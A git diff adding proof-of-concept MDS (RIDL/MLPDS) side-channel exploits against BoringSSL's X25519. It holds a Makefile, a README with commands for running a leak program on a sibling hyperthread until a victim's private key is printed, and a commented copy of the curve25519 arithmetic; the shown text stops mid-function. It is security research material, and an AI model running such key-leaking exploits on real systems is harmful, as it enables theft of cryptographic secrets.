diff --git a/pocs/cpus/mds-x25519/Makefile b/pocs/cpus/mds-x25519/Makefile new file mode 100644 index 00000000..91ec33f7 --- /dev/null +++ b/pocs/cpus/mds-x25519/Makefile @@ -0,0 +1,21 @@ +.PHONY: all clean + +all: leak_evict_x25519 leak_intermediate_x25519 leak_multiprocess x25519_victim + +CFLAGS=-O3 -mrtm -static -masm=intel + +boringssl/crypto/curve25519/fake_x25519.c: fake_x25519.c + git clone https://boringssl.googlesource.com/boringssl || true + cp fake_x25519.c boringssl/crypto/curve25519/fake_x25519.c + +leak_intermediate_x25519: boringssl/crypto/curve25519/fake_x25519.c leak_intermediate_x25519.c + cc $^ -o $@ $(CFLAGS) -Iboringssl/include + +leak_multiprocess: boringssl/crypto/curve25519/fake_x25519.c leak_multiprocess.c + cc $^ -o $@ $(CFLAGS) -Iboringssl/include + +x25519_victim: boringssl/crypto/curve25519/curve25519.c x25519_victim.c + cc $^ -o $@ $(CFLAGS) -Iboringssl/include -lssl -lcrypto + +clean: + - rm -rf leak_evict_x25519 leak_intermediate_x25519 leak_multiprocess x25519_victim boringssl diff --git a/pocs/cpus/mds-x25519/README.md b/pocs/cpus/mds-x25519/README.md new file mode 100644 index 00000000..67da441e --- /dev/null +++ b/pocs/cpus/mds-x25519/README.md @@ -0,0 +1,57 @@ + + +# MDS exploits + +## How to run + +The RIDL exploit, `leak_evict_x25519.c`, unfortunately targets an internal +server, so you won't be able to reproduce our results. + +The MLPDS exploit, although it targets the same server, does not depend on +the server's memory layout, so we prepared a custom victim that just calls the +`X25519` function in an infinite loop. To run, first compile the code: + +``` +make +``` + +This will also clone the boringssl repository (it's a dependency). +Check how many logical CPUs (hardware threads) your machine has: + +``` +nproc --all +``` + +For my workstation, it prints `12`, which means I have 6 cores (with +hyperthreading doubling the number).
Run the victim: + +``` +taskset -a -c 2 ./x25519_victim +``` + +In another terminal, run the exploit: + +``` +taskset -a -c 8 ./leak_intermediate_x25519 <<< "1 2 3 4 5 6 7 8 9 a b c d e f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20" +``` + +The `1 2 3...` string is the client private key used in X25519. +Note that I pin the two processes to logical CPUs 2 and 8, which are 6 apart (the number of physical cores), +meaning they run on sibling threads of the same core. You should see some intermediate output pretty quickly, and +after 255 iterations (say 10 minutes, depending on CPU), the process will finish. +The last line will show the leaked secret: + +``` +Secret: 70 72 69 76 74 65 73 74 31 32 33 34 35 36 37 38 73 6f 6d 65 6d 6f 72 65 62 69 74 73 41 42 43 44 +``` + +If you decode the hexadecimal, it says `privtest12345678somemorebitsABCD`, which +was the private key hardcoded in `x25519_victim.c`. + +If you wait several minutes and only ever get the `--- diff_abs 0 (0 vs. 0, total 0)` +result, something's wrong. You should check that hyperthreading is enabled, and +that your CPU supports TSX and that TSX is not disabled. + +If you want to try the multithreaded exploit, `leak_multiprocess.c`, change +`#define CPU_NUM 6` to the actual number of cores in your CPU before +compiling. Other than that, the usage is the same. diff --git a/pocs/cpus/mds-x25519/fake_x25519.c b/pocs/cpus/mds-x25519/fake_x25519.c new file mode 100644 index 00000000..71f4deda --- /dev/null +++ b/pocs/cpus/mds-x25519/fake_x25519.c @@ -0,0 +1,1850 @@ +/* Copyright (c) 2020, Google Inc. + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY + * SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION + * OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN + * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ +// Some of this code is taken from the ref10 version of Ed25519 in SUPERCOP +// 20141124 (http://bench.cr.yp.to/supercop.html). That code is released as +// public domain. Other parts have been replaced to call into code generated by +// Fiat (https://github.com/mit-plv/fiat-crypto) in //third_party/fiat. +// +// The field functions are shared by Ed25519 and X25519 where possible. +#include +#include +#include +#include +#include +#include +#include +#include "internal.h" +#include "../internal.h" +// Various pre-computed constants. +#include "./curve25519_tables.h" +#if defined(OPENSSL_NO_ASM) +#define FIAT_25519_NO_ASM +#endif +#if defined(BORINGSSL_CURVE25519_64BIT) +#include "../../third_party/fiat/curve25519_64.h" +#else +#include "../../third_party/fiat/curve25519_32.h" +#endif // BORINGSSL_CURVE25519_64BIT +// Low-level intrinsic operations +static uint64_t load_3(const uint8_t *in) { + uint64_t result; + result = (uint64_t)in[0]; + result |= ((uint64_t)in[1]) << 8; + result |= ((uint64_t)in[2]) << 16; + return result; +} +static uint64_t load_4(const uint8_t *in) { + uint64_t result; + result = (uint64_t)in[0]; + result |= ((uint64_t)in[1]) << 8; + result |= ((uint64_t)in[2]) << 16; + result |= ((uint64_t)in[3]) << 24; + return result; +} +// Field operations. 
#if defined(BORINGSSL_CURVE25519_64BIT)

// 64-bit configuration: limbs are uint64_t and FE_NUM_LIMBS is 5.
typedef uint64_t fe_limb_t;
#define FE_NUM_LIMBS 5

// assert_fe asserts that |f| satisfies bounds:
//
//  [[0x0 ~> 0x8cccccccccccc],
//   [0x0 ~> 0x8cccccccccccc],
//   [0x0 ~> 0x8cccccccccccc],
//   [0x0 ~> 0x8cccccccccccc],
//   [0x0 ~> 0x8cccccccccccc]]
//
// See comments in curve25519_64.h for which functions use these bounds for
// inputs or outputs.
//
// |f| is indexed directly, so callers pass the limb array (e.g. |x->v|).
#define assert_fe(f)                                                    \
  do {                                                                  \
    for (unsigned _assert_fe_i = 0; _assert_fe_i < 5; _assert_fe_i++) { \
      assert(f[_assert_fe_i] <= UINT64_C(0x8cccccccccccc));             \
    }                                                                   \
  } while (0)

// assert_fe_loose asserts that |f| satisfies bounds:
//
//  [[0x0 ~> 0x1a666666666664],
//   [0x0 ~> 0x1a666666666664],
//   [0x0 ~> 0x1a666666666664],
//   [0x0 ~> 0x1a666666666664],
//   [0x0 ~> 0x1a666666666664]]
//
// See comments in curve25519_64.h for which functions use these bounds for
// inputs or outputs.
//
// These limits are larger than the |assert_fe| limits, so any value that
// passes |assert_fe| also passes |assert_fe_loose|.
#define assert_fe_loose(f)                                              \
  do {                                                                  \
    for (unsigned _assert_fe_i = 0; _assert_fe_i < 5; _assert_fe_i++) { \
      assert(f[_assert_fe_i] <= UINT64_C(0x1a666666666664));            \
    }                                                                   \
  } while (0)

#else

// 32-bit configuration: limbs are uint32_t and FE_NUM_LIMBS is 10.
typedef uint32_t fe_limb_t;
#define FE_NUM_LIMBS 10

// assert_fe asserts that |f| satisfies bounds:
//
//  [[0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333]]
//
// See comments in curve25519_32.h for which functions use these bounds for
// inputs or outputs.
//
// Even-indexed and odd-indexed limbs have different limits; the ternary on
// the low bit of the index selects between them.
#define assert_fe(f)                                                     \
  do {                                                                   \
    for (unsigned _assert_fe_i = 0; _assert_fe_i < 10; _assert_fe_i++) { \
      assert(f[_assert_fe_i] <=                                          \
             ((_assert_fe_i & 1) ? 0x2333333u : 0x4666666u));            \
    }                                                                    \
  } while (0)

// assert_fe_loose asserts that |f| satisfies bounds:
//
//  [[0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999]]
//
// See comments in curve25519_32.h for which functions use these bounds for
// inputs or outputs.
#define assert_fe_loose(f)                                               \
  do {                                                                   \
    for (unsigned _assert_fe_i = 0; _assert_fe_i < 10; _assert_fe_i++) { \
      assert(f[_assert_fe_i] <=                                          \
             ((_assert_fe_i & 1) ? 0x6999999u : 0xd333332u));            \
    }                                                                    \
  } while (0)

#endif  // BORINGSSL_CURVE25519_64BIT

// The size check below is commented out, and OPENSSL_STATIC_ASSERT is defined
// to expand to nothing, so every use of OPENSSL_STATIC_ASSERT after this point
// in the file performs no check.
// NOTE(review): if an included header already defines OPENSSL_STATIC_ASSERT,
// this #define is a macro redefinition - confirm against the real include list.
//OPENSSL_STATIC_ASSERT(sizeof(fe) == sizeof(fe_limb_t) * FE_NUM_LIMBS,
//                      "fe_limb_t[FE_NUM_LIMBS] is inconsistent with fe");
#define OPENSSL_STATIC_ASSERT(...)

// fe_frombytes_strict fills |h| from the 32 bytes at |s| by calling
// |fiat_25519_from_bytes|. The top bit of s[31] must already be clear
// (asserted), and the result is asserted to satisfy the |assert_fe| bounds.
static void fe_frombytes_strict(fe *h, const uint8_t s[32]) {
  // |fiat_25519_from_bytes| requires the top-most bit be clear.
  assert((s[31] & 0x80) == 0);
  fiat_25519_from_bytes(h->v, s);
  assert_fe(h->v);
}

// fe_frombytes is |fe_frombytes_strict| for arbitrary input: it works on a
// local copy of |s| with the top bit of byte 31 cleared, so |s| itself is not
// modified and the top bit of the input is ignored.
static void fe_frombytes(fe *h, const uint8_t s[32]) {
  uint8_t s_copy[32];
  OPENSSL_memcpy(s_copy, s, 32);
  s_copy[31] &= 0x7f;
  fe_frombytes_strict(h, s_copy);
}

// fe_tobytes writes the 32-byte encoding of |f| to |s| using
// |fiat_25519_to_bytes|. |f| is asserted to satisfy the |assert_fe| bounds.
static void fe_tobytes(uint8_t s[32], const fe *f) {
  assert_fe(f->v);
  fiat_25519_to_bytes(s, f->v);
}

// h = 0
static void fe_0(fe *h) {
  OPENSSL_memset(h, 0, sizeof(fe));
}

// h = 0, for the |fe_loose| type.
static void fe_loose_0(fe_loose *h) {
  OPENSSL_memset(h, 0, sizeof(fe_loose));
}

// h = 1
static void fe_1(fe *h) {
  // Zero every limb, then set the first limb to 1.
  OPENSSL_memset(h, 0, sizeof(fe));
  h->v[0] = 1;
}

// h = 1, for the |fe_loose| type.
static void fe_loose_1(fe_loose *h) {
  OPENSSL_memset(h, 0, sizeof(fe_loose));
  h->v[0] = 1;
}

// h = f + g
// Can overlap h with f or g.
//
// Both inputs are asserted to satisfy the |assert_fe| bounds; the sum is not
// carried and is asserted to satisfy only the |assert_fe_loose| bounds, which
// is why the output type is |fe_loose|.
static void fe_add(fe_loose *h, const fe *f, const fe *g) {
  assert_fe(f->v);
  assert_fe(g->v);
  fiat_25519_add(h->v, f->v, g->v);
  assert_fe_loose(h->v);
}

// h = f - g
// Can overlap h with f or g.
// Both inputs are asserted to satisfy the |assert_fe| bounds; the difference
// is asserted to satisfy only the |assert_fe_loose| bounds.
static void fe_sub(fe_loose *h, const fe *f, const fe *g) {
  assert_fe(f->v);
  assert_fe(g->v);
  fiat_25519_sub(h->v, f->v, g->v);
  assert_fe_loose(h->v);
}

// fe_carry converts the loosely-bounded |f| into |h| via |fiat_25519_carry|.
// The input is asserted against the |assert_fe_loose| bounds and the output
// against the |assert_fe| bounds.
static void fe_carry(fe *h, const fe_loose* f) {
  assert_fe_loose(f->v);
  fiat_25519_carry(h->v, f->v);
  assert_fe(h->v);
}

// fe_mul_impl sets out = in1 * in2 using |fiat_25519_carry_mul|. It works on
// raw limb arrays so that the typed wrappers below can share it. Inputs only
// need to satisfy the |assert_fe_loose| bounds; the output is asserted to
// satisfy the |assert_fe| bounds.
static void fe_mul_impl(fe_limb_t out[FE_NUM_LIMBS],
                        const fe_limb_t in1[FE_NUM_LIMBS],
                        const fe_limb_t in2[FE_NUM_LIMBS]) {
  assert_fe_loose(in1);
  assert_fe_loose(in2);
  fiat_25519_carry_mul(out, in1, in2);
  assert_fe(out);
}

// The fe_mul_XYZ wrappers all compute h = f * g through |fe_mul_impl|. The
// three suffix letters give the types of h, f and g in that order: 't' is
// |fe| and 'l' is |fe_loose|.

static void fe_mul_ltt(fe_loose *h, const fe *f, const fe *g) {
  fe_mul_impl(h->v, f->v, g->v);
}

static void fe_mul_llt(fe_loose *h, const fe_loose *f, const fe *g) {
  fe_mul_impl(h->v, f->v, g->v);
}

static void fe_mul_ttt(fe *h, const fe *f, const fe *g) {
  fe_mul_impl(h->v, f->v, g->v);
}

static void fe_mul_tlt(fe *h, const fe_loose *f, const fe *g) {
  fe_mul_impl(h->v, f->v, g->v);
}

static void fe_mul_ttl(fe *h, const fe *f, const fe_loose *g) {
  fe_mul_impl(h->v, f->v, g->v);
}

static void fe_mul_tll(fe *h, const fe_loose *f, const fe_loose *g) {
  fe_mul_impl(h->v, f->v, g->v);
}

// h = f^2 for an |fe_loose| input, using |fiat_25519_carry_square|. The output
// is asserted to satisfy the |assert_fe| bounds.
static void fe_sq_tl(fe *h, const fe_loose *f) {
  assert_fe_loose(f->v);
  fiat_25519_carry_square(h->v, f->v);
  assert_fe(h->v);
}

// h = f^2 for an |fe| input. The body is the same as |fe_sq_tl|; note that
// the input is only checked against the |assert_fe_loose| bounds here.
static void fe_sq_tt(fe *h, const fe *f) {
  assert_fe_loose(f->v);
  fiat_25519_carry_square(h->v, f->v);
  assert_fe(h->v);
}

// Replace (f,g) with (g,f) if b == 1;
// replace (f,g) with (f,g) if b == 0.
//
// Preconditions: b in {0,1}.
static void fe_cswap(fe *f, fe *g, fe_limb_t b) {
  // Turn b (0 or 1) into an all-zeros or all-ones limb mask.
  b = 0-b;
  for (unsigned i = 0; i < FE_NUM_LIMBS; i++) {
    // x is f ^ g when the mask is set and 0 otherwise, so the two XORs below
    // either exchange the limbs or leave both unchanged. No branch depends
    // on b.
    fe_limb_t x = f->v[i] ^ g->v[i];
    x &= b;
    f->v[i] ^= x;
    g->v[i] ^= x;
  }
}

// fe_mul121666 sets |h| from |f| using |fiat_25519_carry_scmul_121666|
// (going by the primitive's name, multiplication by the constant 121666).
// The input is asserted against the |assert_fe_loose| bounds and the output
// against the |assert_fe| bounds.
static void fe_mul121666(fe *h, const fe_loose *f) {
  assert_fe_loose(f->v);
  fiat_25519_carry_scmul_121666(h->v, f->v);
  assert_fe(h->v);
}

// h = -f
static void fe_neg(fe_loose *h, const fe *f) {
  assert_fe(f->v);
  fiat_25519_opp(h->v, f->v);
  assert_fe_loose(h->v);
}

// Replace (f,g) with (g,g) if b == 1;
// replace (f,g) with (f,g) if b == 0.
//
// Preconditions: b in {0,1}.
static void fe_cmov(fe_loose *f, const fe_loose *g, fe_limb_t b) {
  // Silence an unused function warning. |fiat_25519_selectznz| isn't quite the
  // calling convention the rest of this code wants, so implement it by hand.
  //
  // TODO(davidben): Switch to fiat's calling convention, or ask fiat to emit a
  // different one.
  (void)fiat_25519_selectznz;

  // Same masking technique as |fe_cswap|, but only |f| is written.
  b = 0-b;
  for (unsigned i = 0; i < FE_NUM_LIMBS; i++) {
    fe_limb_t x = f->v[i] ^ g->v[i];
    x &= b;
    f->v[i] ^= x;
  }
}

// h = f
static void fe_copy(fe *h, const fe *f) {
  // memmove, so |h| and |f| may be the same object.
  OPENSSL_memmove(h, f, sizeof(fe));
}

// h = f, copying an |fe| into an |fe_loose|. This relies on the two types
// having the same size, which the OPENSSL_STATIC_ASSERT line below states.
static void fe_copy_lt(fe_loose *h, const fe *f) {
  OPENSSL_STATIC_ASSERT(sizeof(fe_loose) == sizeof(fe),
                        "fe and fe_loose mismatch");
  OPENSSL_memmove(h, f, sizeof(fe));
}

#if !defined(OPENSSL_SMALL)
// h = f for two |fe_loose| values. Only compiled when OPENSSL_SMALL is not
// defined.
static void fe_copy_ll(fe_loose *h, const fe_loose *f) {
  OPENSSL_memmove(h, f, sizeof(fe_loose));
}
#endif // !defined(OPENSSL_SMALL)

// fe_loose_invert sets out = z^(2^255 - 21) with a fixed sequence of squarings
// and multiplications. If the field modulus is p = 2^255 - 19 this exponent is
// p - 2, i.e. |out| is the multiplicative inverse of |z|. The per-line
// comments give the exponent of z held by the variable just written.
static void fe_loose_invert(fe *out, const fe_loose *z) {
  fe t0;
  fe t1;
  fe t2;
  fe t3;
  int i;

  fe_sq_tl(&t0, z);            // t0 = z^2
  fe_sq_tt(&t1, &t0);
  for (i = 1; i < 2; ++i) {
    fe_sq_tt(&t1, &t1);
  }                            // t1 = z^8
  fe_mul_tlt(&t1, z, &t1);     // t1 = z^9
  fe_mul_ttt(&t0, &t0, &t1);   // t0 = z^11
  fe_sq_tt(&t2, &t0);          // t2 = z^22
  fe_mul_ttt(&t1, &t1, &t2);   // t1 = z^31 = z^(2^5 - 1)
  fe_sq_tt(&t2, &t1);
  for (i = 1; i < 5; ++i) {
    fe_sq_tt(&t2, &t2);
  }                            // t2 = z^(2^10 - 2^5)
  fe_mul_ttt(&t1, &t2, &t1);   // t1 = z^(2^10 - 1)
  fe_sq_tt(&t2, &t1);
  for (i = 1; i < 10; ++i) {
    fe_sq_tt(&t2, &t2);
  }                            // t2 = z^(2^20 - 2^10)
  fe_mul_ttt(&t2, &t2, &t1);   // t2 = z^(2^20 - 1)
  fe_sq_tt(&t3, &t2);
  for (i = 1; i < 20; ++i) {
    fe_sq_tt(&t3, &t3);
  }                            // t3 = z^(2^40 - 2^20)
  fe_mul_ttt(&t2, &t3, &t2);   // t2 = z^(2^40 - 1)
  fe_sq_tt(&t2, &t2);
  for (i = 1; i < 10; ++i) {
    fe_sq_tt(&t2, &t2);
  }                            // t2 = z^(2^50 - 2^10)
  fe_mul_ttt(&t1, &t2, &t1);   // t1 = z^(2^50 - 1)
  fe_sq_tt(&t2, &t1);
  for (i = 1; i < 50; ++i) {
    fe_sq_tt(&t2, &t2);
  }                            // t2 = z^(2^100 - 2^50)
  fe_mul_ttt(&t2, &t2, &t1);   // t2 = z^(2^100 - 1)
  fe_sq_tt(&t3, &t2);
  for (i = 1; i < 100; ++i) {
    fe_sq_tt(&t3, &t3);
  }                            // t3 = z^(2^200 - 2^100)
  fe_mul_ttt(&t2, &t3, &t2);   // t2 = z^(2^200 - 1)
  fe_sq_tt(&t2, &t2);
  for (i = 1; i < 50; ++i) {
    fe_sq_tt(&t2, &t2);
  }                            // t2 = z^(2^250 - 2^50)
  fe_mul_ttt(&t1, &t2, &t1);   // t1 = z^(2^250 - 1)
  fe_sq_tt(&t1, &t1);
  for (i = 1; i < 5; ++i) {
    fe_sq_tt(&t1, &t1);
  }                            // t1 = z^(2^255 - 32)
  fe_mul_ttt(out, &t1, &t0);   // out = z^(2^255 - 21)
}

// fe_invert is |fe_loose_invert| for an |fe| input: it copies |z| into an
// |fe_loose| and inverts that.
static void fe_invert(fe *out, const fe *z) {
  fe_loose l;
  fe_copy_lt(&l, z);
  fe_loose_invert(out, &l);
}

// return 0 if f == 0
// return 1 if f != 0
static int fe_isnonzero(const fe_loose *f) {
  // Carry and serialise first, then compare the 32-byte encoding against
  // all-zero bytes with |CRYPTO_memcmp|.
  fe tight;
  fe_carry(&tight, f);
  uint8_t s[32];
  fe_tobytes(s, &tight);

  static const uint8_t zero[32] = {0};
  return CRYPTO_memcmp(s, zero, sizeof(zero)) != 0;
}

// return 1 if f is in {1,3,5,...,q-2}
// return 0 if f is in {0,2,4,...,q-1}
static int fe_isnegative(const fe *f) {
  // The result is the lowest bit of the first byte of the encoding of |f|.
  uint8_t s[32];
  fe_tobytes(s, f);
  return s[0] & 1;
}

// h = 2 * f^2, carried so that the result is an |fe|.
static void fe_sq2_tt(fe *h, const fe *f) {
  // h = f^2
  fe_sq_tt(h, f);

  // h = h + h
  fe_loose tmp;
  fe_add(&tmp, h, h);
  fe_carry(h, &tmp);
}

// fe_pow22523 sets out = z^(2^252 - 3) with a fixed sequence of squarings and
// multiplications. The per-line comments give the exponent of z held by the
// variable just written.
static void fe_pow22523(fe *out, const fe *z) {
  fe t0;
  fe t1;
  fe t2;
  int i;

  fe_sq_tt(&t0, z);            // t0 = z^2
  fe_sq_tt(&t1, &t0);
  for (i = 1; i < 2; ++i) {
    fe_sq_tt(&t1, &t1);
  }                            // t1 = z^8
  fe_mul_ttt(&t1, z, &t1);     // t1 = z^9
  fe_mul_ttt(&t0, &t0, &t1);   // t0 = z^11
  fe_sq_tt(&t0, &t0);          // t0 = z^22
  fe_mul_ttt(&t0, &t1, &t0);   // t0 = z^31 = z^(2^5 - 1)
  fe_sq_tt(&t1, &t0);
  for (i = 1; i < 5; ++i) {
    fe_sq_tt(&t1, &t1);
  }                            // t1 = z^(2^10 - 2^5)
  fe_mul_ttt(&t0, &t1, &t0);   // t0 = z^(2^10 - 1)
  fe_sq_tt(&t1, &t0);
  for (i = 1; i < 10; ++i) {
    fe_sq_tt(&t1, &t1);
  }                            // t1 = z^(2^20 - 2^10)
  fe_mul_ttt(&t1, &t1, &t0);   // t1 = z^(2^20 - 1)
  fe_sq_tt(&t2, &t1);
  for (i = 1; i < 20; ++i) {
    fe_sq_tt(&t2, &t2);
  }                            // t2 = z^(2^40 - 2^20)
  fe_mul_ttt(&t1, &t2, &t1);   // t1 = z^(2^40 - 1)
  fe_sq_tt(&t1, &t1);
  for (i = 1; i < 10; ++i) {
    fe_sq_tt(&t1, &t1);
  }                            // t1 = z^(2^50 - 2^10)
  fe_mul_ttt(&t0, &t1, &t0);   // t0 = z^(2^50 - 1)
  fe_sq_tt(&t1, &t0);
  for (i = 1; i < 50; ++i) {
    fe_sq_tt(&t1, &t1);
  }                            // t1 = z^(2^100 - 2^50)
  fe_mul_ttt(&t1, &t1, &t0);   // t1 = z^(2^100 - 1)
  fe_sq_tt(&t2, &t1);
  for (i = 1; i < 100; ++i) {
    fe_sq_tt(&t2, &t2);
  }                            // t2 = z^(2^200 - 2^100)
  fe_mul_ttt(&t1, &t2, &t1);   // t1 = z^(2^200 - 1)
  fe_sq_tt(&t1, &t1);
  for (i = 1; i < 50; ++i) {
    fe_sq_tt(&t1, &t1);
  }                            // t1 = z^(2^250 - 2^50)
  fe_mul_ttt(&t0, &t1, &t0);   // t0 = z^(2^250 - 1)
  fe_sq_tt(&t0, &t0);
  for (i = 1; i < 2; ++i) {
    fe_sq_tt(&t0, &t0);
  }                            // t0 = z^(2^252 - 4)
  fe_mul_ttt(out, &t0, z);     // out = z^(2^252 - 3)
}


// Group operations.

// x25519_ge_tobytes writes a 32-byte encoding of the point |h| to |s|: the
// encoding of y = Y/Z, with the top bit of s[31] XORed with the result of
// |fe_isnegative| on x = X/Z.
void x25519_ge_tobytes(uint8_t s[32], const ge_p2 *h) {
  fe recip;
  fe x;
  fe y;

  fe_invert(&recip, &h->Z);
  fe_mul_ttt(&x, &h->X, &recip);
  fe_mul_ttt(&y, &h->Y, &recip);
  fe_tobytes(s, &y);
  s[31] ^= fe_isnegative(&x) << 7;
}

// ge_p3_tobytes is the same as |x25519_ge_tobytes| for a |ge_p3| input; the T
// coordinate is not used.
static void ge_p3_tobytes(uint8_t s[32], const ge_p3 *h) {
  fe recip;
  fe x;
  fe y;

  fe_invert(&recip, &h->Z);
  fe_mul_ttt(&x, &h->X, &recip);
  fe_mul_ttt(&y, &h->Y, &recip);
  fe_tobytes(s, &y);
  s[31] ^= fe_isnegative(&x) << 7;
}

// ge_p2_0 sets |h| to (X, Y, Z) = (0, 1, 1).
static void ge_p2_0(ge_p2 *h) {
  fe_0(&h->X);
  fe_1(&h->Y);
  fe_1(&h->Z);
}

// ge_p3_0 sets |h| to (X, Y, Z, T) = (0, 1, 1, 0).
static void ge_p3_0(ge_p3 *h) {
  fe_0(&h->X);
  fe_1(&h->Y);
  fe_1(&h->Z);
  fe_0(&h->T);
}

// ge_cached_0 sets |h| to (YplusX, YminusX, Z, T2d) = (1, 1, 1, 0).
static void ge_cached_0(ge_cached *h) {
  fe_loose_1(&h->YplusX);
  fe_loose_1(&h->YminusX);
  fe_loose_1(&h->Z);
  fe_loose_0(&h->T2d);
}

// ge_precomp_0 sets |h| to (yplusx, yminusx, xy2d) = (1, 1, 0).
static void ge_precomp_0(ge_precomp *h) {
  fe_loose_1(&h->yplusx);
  fe_loose_1(&h->yminusx);
  fe_loose_0(&h->xy2d);
}

// r = p
static void ge_p3_to_p2(ge_p2 *r, const ge_p3 *p) {
  // Copies X, Y and Z; T has no counterpart in |ge_p2|.
  fe_copy(&r->X, &p->X);
  fe_copy(&r->Y, &p->Y);
  fe_copy(&r->Z, &p->Z);
}

// r = p
void x25519_ge_p3_to_cached(ge_cached *r, const ge_p3 *p) {
  // YplusX = Y + X, YminusX = Y - X, Z = Z, T2d = T * d2. |d2| is a constant
  // defined outside this section of the file.
  fe_add(&r->YplusX, &p->Y, &p->X);
  fe_sub(&r->YminusX, &p->Y, &p->X);
  fe_copy_lt(&r->Z, &p->Z);
  fe_mul_ltt(&r->T2d, &p->T, &d2);
}

// r = p
void x25519_ge_p1p1_to_p2(ge_p2 *r, const ge_p1p1 *p) {
  // X = p.X * p.T, Y = p.Y * p.Z, Z = p.Z * p.T.
  fe_mul_tll(&r->X, &p->X, &p->T);
  fe_mul_tll(&r->Y, &p->Y, &p->Z);
  fe_mul_tll(&r->Z, &p->Z, &p->T);
}
// r = p
void x25519_ge_p1p1_to_p3(ge_p3 *r, const ge_p1p1 *p) {
  // X = p.X * p.T, Y = p.Y * p.Z, Z = p.Z * p.T, T = p.X * p.Y.
  fe_mul_tll(&r->X, &p->X, &p->T);
  fe_mul_tll(&r->Y, &p->Y, &p->Z);
  fe_mul_tll(&r->Z, &p->Z, &p->T);
  fe_mul_tll(&r->T, &p->X, &p->Y);
}

// r = p
static void ge_p1p1_to_cached(ge_cached *r, const ge_p1p1 *p) {
  // Goes through an intermediate |ge_p3|.
  ge_p3 t;
  x25519_ge_p1p1_to_p3(&t, p);
  x25519_ge_p3_to_cached(r, &t);
}

// r = 2 * p
static void ge_p2_dbl(ge_p1p1 *r, const ge_p2 *p) {
  fe trX, trZ, trT;
  fe t0;

  fe_sq_tt(&trX, &p->X);        // trX = X^2
  fe_sq_tt(&trZ, &p->Y);        // trZ = Y^2
  fe_sq2_tt(&trT, &p->Z);       // trT = 2 * Z^2
  fe_add(&r->Y, &p->X, &p->Y);  // r->Y is used as scratch for X + Y
  fe_sq_tl(&t0, &r->Y);         // t0 = (X + Y)^2

  fe_add(&r->Y, &trZ, &trX);    // r->Y = Y^2 + X^2
  fe_sub(&r->Z, &trZ, &trX);    // r->Z = Y^2 - X^2
  fe_carry(&trZ, &r->Y);        // trZ = carried copy of r->Y
  fe_sub(&r->X, &t0, &trZ);     // r->X = (X + Y)^2 - (Y^2 + X^2)
  fe_carry(&trZ, &r->Z);        // trZ = carried copy of r->Z
  fe_sub(&r->T, &trT, &trZ);    // r->T = 2 * Z^2 - (Y^2 - X^2)
}

// r = 2 * p
static void ge_p3_dbl(ge_p1p1 *r, const ge_p3 *p) {
  // Drops T and reuses the |ge_p2| doubling.
  ge_p2 q;
  ge_p3_to_p2(&q, p);
  ge_p2_dbl(r, &q);
}

// r = p + q
static void ge_madd(ge_p1p1 *r, const ge_p3 *p, const ge_precomp *q) {
  fe trY, trZ, trT;

  // The fields of |r| are used as scratch before receiving their final values,
  // so the statement order matters.
  fe_add(&r->X, &p->Y, &p->X);
  fe_sub(&r->Y, &p->Y, &p->X);
  fe_mul_tll(&trZ, &r->X, &q->yplusx);   // trZ = (Y + X) * q.yplusx
  fe_mul_tll(&trY, &r->Y, &q->yminusx);  // trY = (Y - X) * q.yminusx
  fe_mul_tlt(&trT, &q->xy2d, &p->T);     // trT = q.xy2d * T
  fe_add(&r->T, &p->Z, &p->Z);           // r->T = 2 * Z (scratch)
  fe_sub(&r->X, &trZ, &trY);
  fe_add(&r->Y, &trZ, &trY);
  fe_carry(&trZ, &r->T);                 // trZ = carried 2 * Z
  fe_add(&r->Z, &trZ, &trT);
  fe_sub(&r->T, &trZ, &trT);
}

// r = p - q
static void ge_msub(ge_p1p1 *r, const ge_p3 *p, const ge_precomp *q) {
  fe trY, trZ, trT;

  // Same as |ge_madd| with the roles of q.yplusx and q.yminusx exchanged and
  // the final add and sub exchanged.
  fe_add(&r->X, &p->Y, &p->X);
  fe_sub(&r->Y, &p->Y, &p->X);
  fe_mul_tll(&trZ, &r->X, &q->yminusx);
  fe_mul_tll(&trY, &r->Y, &q->yplusx);
  fe_mul_tlt(&trT, &q->xy2d, &p->T);
  fe_add(&r->T, &p->Z, &p->Z);
  fe_sub(&r->X, &trZ, &trY);
  fe_add(&r->Y, &trZ, &trY);
  fe_carry(&trZ, &r->T);
  fe_sub(&r->Z, &trZ, &trT);
  fe_add(&r->T, &trZ, &trT);
}

// r = p + q
void x25519_ge_add(ge_p1p1 *r, const ge_p3 *p, const ge_cached *q) {
  fe trX, trY, trZ, trT;

  // Like |ge_madd|, except that |q| carries its own Z, so 2 * Z is replaced
  // by 2 * (p.Z * q.Z).
  fe_add(&r->X, &p->Y, &p->X);
  fe_sub(&r->Y, &p->Y, &p->X);
  fe_mul_tll(&trZ, &r->X, &q->YplusX);
  fe_mul_tll(&trY, &r->Y, &q->YminusX);
  fe_mul_tlt(&trT, &q->T2d, &p->T);
  fe_mul_ttl(&trX, &p->Z, &q->Z);        // trX = p.Z * q.Z
  fe_add(&r->T, &trX, &trX);             // r->T = 2 * p.Z * q.Z (scratch)
  fe_sub(&r->X, &trZ, &trY);
  fe_add(&r->Y, &trZ, &trY);
  fe_carry(&trZ, &r->T);
  fe_add(&r->Z, &trZ, &trT);
